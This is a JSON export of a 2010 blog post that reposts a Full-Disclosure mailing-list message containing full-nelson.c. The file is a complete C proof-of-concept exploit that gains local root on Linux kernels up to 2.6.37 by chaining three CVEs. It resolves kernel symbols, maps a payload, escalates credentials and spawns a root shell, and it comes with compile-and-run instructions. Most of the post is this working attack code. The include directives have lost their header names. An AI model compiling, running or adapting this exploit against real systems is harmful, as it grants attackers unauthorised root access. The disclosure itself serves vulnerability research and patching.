{"id":1941,"date":"2010-12-10T20:38:58","date_gmt":"2010-12-10T20:38:58","guid":{"rendered":"http:\/\/www.icocean.com\/blog\/?p=1941"},"modified":"1970-01-01T07:00:00","modified_gmt":"1970-01-01T07:00:00","slug":"linuxkernelexploit","status":"publish","type":"post","link":"https:\/\/www.icocean.com\/blog\/?p=1941","title":{"rendered":"Linux kernel exploit"},"content":{"rendered":"

From: Dan Rosenberg
Date: Tue, 07 Dec 2010 15:25:36 -0500<\/p>\n

Hi all,<\/p>\n

I've included here a proof-of-concept local privilege escalation exploit
for Linux.  Please read the header for an explanation of what's going
on.  Without further ado, I present full-nelson.c:<\/p>\n

Happy hacking,
Dan<\/p>\n

–snip–<\/p>\n

\/*
* Linux Kernel <= 2.6.37 local privilege escalation
* by Dan Rosenberg
* @djrbliss on twitter
*
* Usage:
* gcc full-nelson.c -o full-nelson
* .\/full-nelson
*
* This exploit leverages three vulnerabilities to get root, all of which were
* discovered by Nelson Elhage:
*
* CVE-2010-4258
* ————-
* This is the interesting one, and the reason I wrote this exploit. If a
* thread is created via clone(2) using the CLONE_CHILD_CLEARTID flag, a NULL
* word will be written to a user-specified pointer when that thread exits.
* This write is done using put_user(), which ensures the provided destination
* resides in valid userspace by invoking access_ok(). However, Nelson
* discovered that when the kernel performs an address limit override via
* set_fs(KERNEL_DS) and the thread subsequently OOPSes (via BUG, page fault,
* etc.), this override is not reverted before calling put_user() in the exit
* path, allowing a user to write a NULL word to an arbitrary kernel address.
* Note that this issue requires an additional vulnerability to trigger.
*
* CVE-2010-3849
* ————-
* This is a NULL pointer dereference in the Econet protocol. By itself, it's
* fairly benign as a local denial-of-service. It's a perfect candidate to
* trigger the above issue, since it's reachable via sock_no_sendpage(), which
* subsequently calls sendmsg under KERNEL_DS.
*
* CVE-2010-3850
* ————-
* I wouldn't be able to reach the NULL pointer dereference and trigger the
* OOPS if users weren't able to assign Econet addresses to arbitrary
* interfaces due to a missing capabilities check.
*
* In the interest of public safety, this exploit was specifically designed to
* be limited:
*
* * The particular symbols I resolve are not exported on Slackware or Debian
* * Red Hat does not support Econet by default
* * CVE-2010-3849 and CVE-2010-3850 have both been patched by Ubuntu and
* Debian
*
* However, the important issue, CVE-2010-4258, affects everyone, and it would
* be trivial to find an unpatched DoS under KERNEL_DS and write a slightly
* more sophisticated version of this that doesn't have the roadblocks I put in
* to prevent abuse by script kiddies.
*
* Tested on unpatched Ubuntu 10.04 kernels, both x86 and x86-64.
*
* NOTE: the exploit process will deadlock and stay in a zombie state after you
* exit your root shell because the Econet thread OOPSes while holding the
* Econet mutex. It wouldn't be too hard to fix this up, but I didn't bother.
*
* Greets to spender, taviso, stealth, pipacs, jono, kees, and bla
*\/<\/p>\n

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include <\/p>\n

\/* How many bytes should we clear in our
* function pointer to put it into userspace? *\/
#ifdef __x86_64__
#define SHIFT 24
#define OFFSET 3
#else
#define SHIFT 8
#define OFFSET 1
#endif<\/p>\n

\/* thanks spender… *\/
unsigned long get_kernel_sym(char *name)
{
FILE *f;
unsigned long addr;
char dummy;
char sname[512];
struct utsname ver;
int ret;
int rep = 0;
int oldstyle = 0;<\/p>\n

f = fopen(“\/proc\/kallsyms”, “r”);
if (f == NULL) {
f = fopen(“\/proc\/ksyms”, “r”);
if (f == NULL)
goto fallback;
oldstyle = 1;
}<\/p>\n

repeat:
ret = 0;
while(ret != EOF) {
if (!oldstyle)
ret = fscanf(f, “%p %c %s\n”, (void **)&addr, &dummy, sname);
else {
ret = fscanf(f, “%p %s\n”, (void **)&addr, sname);
if (ret == 2) {
char *p;
if (strstr(sname, “_O\/”) || strstr(sname, “_S.”))
continue;
p = strrchr(sname, '_');
if (p > ((char *)sname + 5) && !strncmp(p – 3, “smp”, 3)) {
p = p – 4;
while (p > (char *)sname && *(p – 1) == '_')
p–;
*p = '\0';
}
}
}
if (ret == 0) {
fscanf(f, “%s\n”, sname);
continue;
}
if (!strcmp(name, sname)) {
fprintf(stdout, ” [+] Resolved %s to %p%s\n”, name, (void *)addr, rep ? ” (via System.map)” :
“”);
fclose(f);
return addr;
}
}<\/p>\n

fclose(f);
if (rep)
return 0;
fallback:
uname(&ver);
if (strncmp(ver.release, “2.6”, 3))
oldstyle = 1;
sprintf(sname, “\/boot\/System.map-%s”, ver.release);
f = fopen(sname, “r”);
if (f == NULL)
return 0;
rep = 1;
goto repeat;
}<\/p>\n

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;<\/p>\n

static int __attribute__((regparm(3)))
getroot(void * file, void * vma)
{<\/p>\n

commit_creds(prepare_kernel_cred(0));
return -1;<\/p>\n

}<\/p>\n

\/* Why do I do this? Because on x86-64, the address of
* commit_creds and prepare_kernel_cred are loaded relative
* to rip, which means I can't just copy the above payload
* into my landing area. *\/
void __attribute__((regparm(3)))
trampoline()
{<\/p>\n

#ifdef __x86_64__
asm(“mov $getroot, %rax; call *%rax;”);
#else
asm(“mov $getroot, %eax; call *%eax;”);
#endif<\/p>\n

}<\/p>\n

\/* Triggers a NULL pointer dereference in econet_sendmsg
* via sock_no_sendpage, so it's under KERNEL_DS *\/
int trigger(int * fildes)
{
int ret;
struct ifreq ifr;<\/p>\n

memset(&ifr, 0, sizeof(ifr));
strncpy(ifr.ifr_name, “eth0”, IFNAMSIZ);<\/p>\n

ret = ioctl(fildes[2], SIOCSIFADDR, &ifr);<\/p>\n

if(ret < 0) {
printf(“[*] Failed to set Econet address.\n”);
return -1;
}<\/p>\n

splice(fildes[3], NULL, fildes[1], NULL, 128, 0);
splice(fildes[0], NULL, fildes[2], NULL, 128, 0);<\/p>\n

\/* Shouldn't get here… *\/
exit(0);
}<\/p>\n

int main(int argc, char * argv[])
{
unsigned long econet_ops, econet_ioctl, target, landing;
int fildes[4], pid;
void * newstack, * payload;<\/p>\n

\/* Create file descriptors now so there are two
references to them after cloning…otherwise
the child will never return because it
deadlocks when trying to unlock various
mutexes after OOPSing *\/
pipe(fildes);
fildes[2] = socket(PF_ECONET, SOCK_DGRAM, 0);
fildes[3] = open(“\/dev\/zero”, O_RDONLY);<\/p>\n

if(fildes[0] < 0 || fildes[1] < 0 || fildes[2] < 0 || fildes[3] < 0) {
printf(“[*] Failed to open file descriptors.\n”);
return -1;
}<\/p>\n

\/* Resolve addresses of relevant symbols *\/
printf(“[*] Resolving kernel addresses…\n”);
econet_ioctl = get_kernel_sym(“econet_ioctl”);
econet_ops = get_kernel_sym(“econet_ops”);
commit_creds = (_commit_creds) get_kernel_sym(“commit_creds”);
prepare_kernel_cred = (_prepare_kernel_cred) get_kernel_sym(“prepare_kernel_cred”);<\/p>\n

if(!econet_ioctl || !commit_creds || !prepare_kernel_cred || !econet_ops) {
printf(“[*] Failed to resolve kernel symbols.\n”);
return -1;
}<\/p>\n

if(!(newstack = malloc(65536))) {
printf(“[*] Failed to allocate memory.\n”);
return -1;
}<\/p>\n

printf(“[*] Calculating target…\n”);
target = econet_ops + 10 * sizeof(void *) – OFFSET;<\/p>\n

\/* Clear the higher bits *\/
landing = econet_ioctl << SHIFT >> SHIFT;<\/p>\n

payload = mmap((void *)(landing & ~0xfff), 2 * 4096,
PROT_READ | PROT_WRITE | PROT_EXEC,
MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0);<\/p>\n

if ((long)payload == -1) {
printf(“[*] Failed to mmap() at target address.\n”);
return -1;
}<\/p>\n

memcpy((void *)landing, &trampoline, 1024);<\/p>\n

clone((int (*)(void *))trigger,
(void *)((unsigned long)newstack + 65536),
CLONE_VM | CLONE_CHILD_CLEARTID | SIGCHLD,
&fildes, NULL, NULL, target);<\/p>\n

sleep(1);<\/p>\n

printf(“[*] Triggering payload…\n”);
ioctl(fildes[2], 0, NULL);<\/p>\n

if(getuid()) {
printf(“[*] Exploit failed to get root.\n”);
return -1;
}<\/p>\n

printf(“[*] Got root!\n”);
execl(“\/bin\/sh”, “\/bin\/sh”, NULL);
}<\/coolcode><\/p>\n

_______________________________________________
Full-Disclosure – We believe in it.
Charter: http:\/\/lists.grok.org.uk\/full-disclosure-charter.html
Hosted and sponsored by Secunia – http:\/\/secunia.com\/<\/p>\n","protected":false},"excerpt":{"rendered":"

From: Dan Rosenberg Date: Tue, 07 Dec 2010 15:25:36 -05 […]<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[16],"tags":[3115,3114,434,3116,604],"class_list":["post-1941","post","type-post","status-publish","format-standard","hentry","category-linuxunix","tag-expoit","tag-kernel","tag-linux","tag-privilege","tag-root","category-16-id","post-seq-1","post-parity-odd","meta-position-corners","fix"],"amp_enabled":true,"_links":{"self":[{"href":"https:\/\/www.icocean.com\/blog\/index.php?rest_route=\/wp\/v2\/posts\/1941","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.icocean.com\/blog\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.icocean.com\/blog\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.icocean.com\/blog\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.icocean.com\/blog\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1941"}],"version-history":[{"count":0,"href":"https:\/\/www.icocean.com\/blog\/index.php?rest_route=\/wp\/v2\/posts\/1941\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.icocean.com\/blog\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1941"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.icocean.com\/blog\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1941"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.icocean.com\/blog\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1941"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}